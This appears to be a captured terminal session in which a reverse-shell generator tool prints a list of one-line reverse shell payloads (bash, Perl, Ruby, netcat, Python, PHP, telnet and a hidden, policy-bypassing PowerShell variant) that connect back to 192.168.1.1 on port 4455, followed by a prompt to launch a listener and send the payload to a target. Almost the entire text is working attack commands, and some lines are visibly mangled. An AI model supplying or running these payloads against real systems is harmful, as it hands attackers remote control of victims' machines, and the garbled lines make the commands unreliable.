1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
| ┌─[✗]─[parrot@parrot]─[~/Desktop/rsg] └──╼ $rsg 192.168.1.1 4455 BASH REVERSE SHELL bash -i >& /dev/tcp/192.168.1.1/4455 0>&1
BASH REVERSE SHELL 0<&196;exec 196<>/dev/tcp/192.168.1.1/4455; sh <&196 >&196 2>&196
PERL REVERSE SHELL perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.1.1:4455");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PERL REVERSE SHELL WINDOWS perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.1.1:4455");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
RUBY REVERSE SHELL ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.1","4455");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
RUBY REVERSE SHELL ruby -rsocket -e'f=TCPSocket.open("192.168.1.1",4455).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
RUBY REVERSE SHELL WINDOWS ruby -rsocket -e 'c=TCPSocket.new("192.168.1.1","4455");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NETCAT REVERSE SHELL nc -c /bin/sh 192.168.1.1 4455
NETCAT REVERSE SHELL /bin/sh | nc 192.168.1.1 4455
NETCAT REVERSE SHELL rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.1 4455 0/tmp/p
PYTHON REVERSE SHELL python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",4455));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP REVERSE SHELL php -r '$sock=fsockopen("192.168.1.1",4455);exec("/bin/sh -i <&3 >&3 2>&3");'
TELNET REVERSE SHELL rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.1 4455 0/tmp/p
POWERSHELL REVERSE SHELL powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.1",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Select your payload, press any key to start the nc listener and send it to the target...
|